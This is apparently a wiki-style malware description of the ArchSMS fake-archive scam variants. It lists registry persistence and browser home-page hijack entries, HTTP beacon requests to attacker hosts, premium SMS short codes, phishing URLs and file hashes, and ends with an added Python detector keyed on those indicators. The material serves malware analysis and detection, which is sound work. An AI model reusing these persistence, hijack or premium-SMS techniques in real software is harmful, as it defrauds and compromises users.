ArchSMS
'''Hoax.Win32.ArchSMS''', or '''ArchSMS''', is a hoax program that sends SMS messages to premium-rate numbers. It has multiple variants.

== ArchSMS.hewm ==
This variant demands a ransom to retrieve the contents of an encrypted archive. Once launched, it creates the following registry key:

 HKCU\Software\Stimul

It then displays a "rules" window; once the user agrees, it asks for a location to unpack the archive into. After imitating the extraction process, it attempts to send the following text to a premium-rate number:

 84***0191

It also makes the following HTTP request:

 GET /functions/sms-api/sms_from_soft.php?user_phone=7&flow_id=1&platnik_id=0&num=2855&pt=1 HTTP/1.1
 User-Agent: Mozilla/3.0 (compatible; Indy Library)
 Host: sti***ofit.com
 Cache-Control: no-cache

The server responds with an integer, such as 123. The support page simply links to the following resource:

 http://vpoiske.sti***aball.com/support.php

== ArchSMS.pin ==
This variant behaves similarly to the previous one. It first creates the following registry keys:

 Explorer\Main
 "Default_Page_URL"="http://www.sm***xi.net"
 "Start Page"="http://www.sm***xi.net"

 Explorer\Main
 "Default_Page_URL"="http://www.sm***xi.net"
 "Start Page"="http://www.sm***xi.net"

It also creates the file %WorkDir%\xsendexe.tmp containing the string est.

Like the other variant, it presents a set of rules and, once the user agrees, allows an archive to be unpacked. However, it demands a ransom for this archive, and it also sends the string 43***04 to one of the following numbers, depending on the country:

* Austria: 0930399999
* Belgium: 7796
* Bulgaria: 1098
* Czech Republic: 9090199
* Germany: 80888
* Denmark: 1945
* Estonia: 17013
* Spain: 5339
* Finland: 179479
* France: 83868
* Hungary: 90645045
* Kyrgyzstan: 1171
* Lithuania: 1645
* Latvia: 1874
* Netherlands: 7117
* Norway: 2322
* Poland: 7910
* Portugal: 68305
* Sweden: 72170

If the infected machine is located in Ukraine, it texts the string 77***01 to the number 4161.

It also sends the following HTTP request:

 GET /pass_request/?guid=3de9581b497e3ea0b9c822735a719b00&parid=0&xnum=&xid=&nomer=+7m=zb&fn=&xtime=&lp= HTTP/1.1
 Accept: */*
 Cache-Control: no-cache
 User-Agent: Opera 10
 Host: wlnrar-auth4.net
 Connection: Keep-Alive

== ArchSMS.ong ==
This variant serves the same payload as the previous variants, with some differences. First, it rigs the system to run the hoax on every startup:

 HKLM\Software\Microsoft\Windows\CurrentVersion\Run
 "winxrar" = """ autostart"

It then creates the following registry keys:

 \InprocServer32
 "(Default)" = "%System%\scrrun.dll"
 "ThreadingModel" = "Both"

 HKCR\CLSID\{7E0F3F10-7B69-8C21-EE01-70DABCF57934}\ProgID
 "(Default)" = "Scripting.FileSystemObject"

 HKCR\CLSID\{7E0F3F10-7B69-8C21-EE01-70DABCF57934}\TypeLib
 "(Default)" = "{420B2830-E718-11CF-893D-00A0C9054228}"

 HKCR\CLSID\{7E0F3F10-7B69-8C21-EE01-70DABCF57934}\Version
 "(Default)" = "1.0"

 HKLM\Software\Licenses
 "{I72A1C76714CAA996}" = "01 00 00 00"

 HKCU\Software\winxrar
 "exerunner" = "was"
 "runcounter" =

After these two actions, it hijacks Internet Explorer by setting the home page to a certain website. To accomplish this, it implants the following keys into the registry:

 Explorer\Main
 "Default_Page_URL" = "http://www.sm***xi.net"
 "Start Page" = "http://www.sm***xi.net"

 Explorer\Main
 "Default_Page_URL" = "http://www.sm***xi.net"
 "Start Page" = "http://www.sm***xi.net"

It also writes the string est to %WorkDir%\xsendexe.tmp. Finally, it retrieves elements from the following website:

 wlnr***th4.net

== ArchSMS.lty ==
This variant reuses elements of the previous variants and shares a very similar payload. It first creates the following registry key:

 HKLM\Software\StimulProfit

It displays the "rules" window, where the user will naturally agree and unpack the file. It then demands a ransom for this archive. After this, it sends three SMS messages to premium numbers.
Upon confirmation, it sends the following HTTP request:

 GET /functions/sms-api/sms_from_soft.php?user_phone=7&flow_id=0&platnik_id=7&num=3855&pt=1 HTTP/1.1
 Host: stimulprofit.com
 Accept: text/html, */*, text/xml
 Accept-Encoding: identity
 User-Agent: Stimulprfit Software

In response, the server returns an integer, for example 123. The SMS message rates are displayed on this site:

 http://sms***11.ru

The Support link points to the following website:

 http://for***e.in/support.php

The application finally links to the following phishing resources:

* http://zaka***aysya.com
* http://vpoi***efiles.com
* http://zaka***ka-file.com
* http://deposi***adfiles.com
* http://rapida***dfiles.com
* http://google***files.com/
* http://zaka***afile.com

== ArchSMS.mvr ==
Compared to the other variants, little is known about this one. The hoax is downloaded from the Internet, advertised as a self-extracting archive containing the files the victim wants to retrieve. Once the rules have been agreed to, the archive may be "unpacked". The archive is then held for ransom: to obtain the unlock code, the victim must send a text to a premium number. The "information for subscribers" link points to the following page:

 http://help-cmc.ru/tarifs/

== Sources ==
* [https://securelist.social-kaspersky.com/en/descriptions/iframe/Hoax.Win32.ArchSMS.hewm Kaspersky Labs (SecureList), ''Hewm variant'']
* [https://securelist.social-kaspersky.com/en/descriptions/iframe/Hoax.Win32.ArchSMS.pin Kaspersky Labs (SecureList), ''Pin variant'']
* [https://securelist.social-kaspersky.com/en/descriptions/iframe/Hoax.Win32.ArchSMS.ong Kaspersky Labs (SecureList), ''Ong variant'']
* [https://securelist.social-kaspersky.com/en/descriptions/iframe/Hoax.Win32.ArchSMS.lty Kaspersky Labs (SecureList), ''lty variant'']
* [https://securelist.social-kaspersky.com/en/descriptions/iframe/Hoax.Win32.ArchSMS.mvr Kaspersky Labs (SecureList), ''mvr variant'']

== Technical Details ==
* ArchSMS.hewm
** MD5: 13DB8201EA98EC0AB953AAB8111134FA
** SHA1: 55A8FF534DCA8250E2B424775010516AD12B0ED1
* ArchSMS.pin
** MD5: Not available
** SHA1: Not available
* ArchSMS.ong
** MD5: 50886C55EFEB926FA5366AB97C8F6AFA
** SHA1: 3B67AD4A1D95D8D1FFC27D3E105A36EA6CAB9C2C
* ArchSMS.lty
** MD5: cc64ee29fdf3600a0d18be9a07f3bbb6
** SHA1: 573b780beffda7de9c7fa61826d7bb67aec0ceb8
* ArchSMS.mvr
** MD5: Not available
** SHA1: Not available

[[Category:Hoax]]
[[Category:Win32]]
[[Category:Win32 hoax]]
[[Category:Scam]]
[[Category:Microsoft Windows]]
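As an added detection example (not code from this page or from Kaspersky's descriptions), the following Python checks proxy request lines and registry paths against the request paths and registry artifacts listed above for the hewm, pin, ong and lty variants; the sample log lines and the variant labels are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Indicators taken from the page: request paths and registry artifacts of the ArchSMS variants.
HTTP_PATH_INDICATORS = {
    "/functions/sms-api/sms_from_soft.php": "ArchSMS.hewm/lty premium-SMS beacon",
    "/pass_request/": "ArchSMS.pin password request",
}
# (lower-cased registry key, value name or None for the key itself) -> label
REGISTRY_INDICATORS = {
    (r"hkcu\software\stimul", None): "ArchSMS.hewm",
    (r"hklm\software\stimulprofit", None): "ArchSMS.lty",
    (r"hkcu\software\winxrar", None): "ArchSMS.ong",
    (r"hklm\software\microsoft\windows\currentversion\run", "winxrar"): "ArchSMS.ong autostart",
}
REQUEST_LINE = re.compile(r"^(?:GET|POST)\s+(\S+)\s+HTTP/1\.[01]")

def check_http_request(line):
    """Return (label, query params) if the request line hits a known ArchSMS path, else None."""
    m = REQUEST_LINE.match(line.strip())
    if not m:
        return None
    url = urlsplit(m.group(1))
    for path, label in HTTP_PATH_INDICATORS.items():
        if url.path == path:  # flatten the query so the short code ("num") is easy to read off
            return label, {k: v[0] for k, v in parse_qs(url.query).items()}
    return None

def check_registry(key, value_name=None):
    """Return the variant label for a registry key (plus optional value name) from the page, else None."""
    norm = (key.strip().lower(), value_name.lower() if value_name else None)
    return REGISTRY_INDICATORS.get(norm)

def scan_proxy_log(lines):
    """Run check_http_request over proxy log lines; return (line number, label, short code) hits."""
    hits = []
    for n, line in enumerate(lines, 1):
        result = check_http_request(line)
        if result:
            label, params = result
            hits.append((n, label, params.get("num")))
    return hits

# Constructed sample lines modelled on the requests quoted above; not a real capture.
SAMPLE_LOG = [
    "GET /index.html HTTP/1.1",
    "GET /functions/sms-api/sms_from_soft.php?user_phone=7&flow_id=0&platnik_id=7&num=3855&pt=1 HTTP/1.1",
    "GET /pass_request/?guid=3de9581b497e3ea0b9c822735a719b00&parid=0&xnum=&xid= HTTP/1.1",
]
```

The masked hostnames on the page cannot be matched literally, so the checks key on the request paths and registry keys the page gives in full.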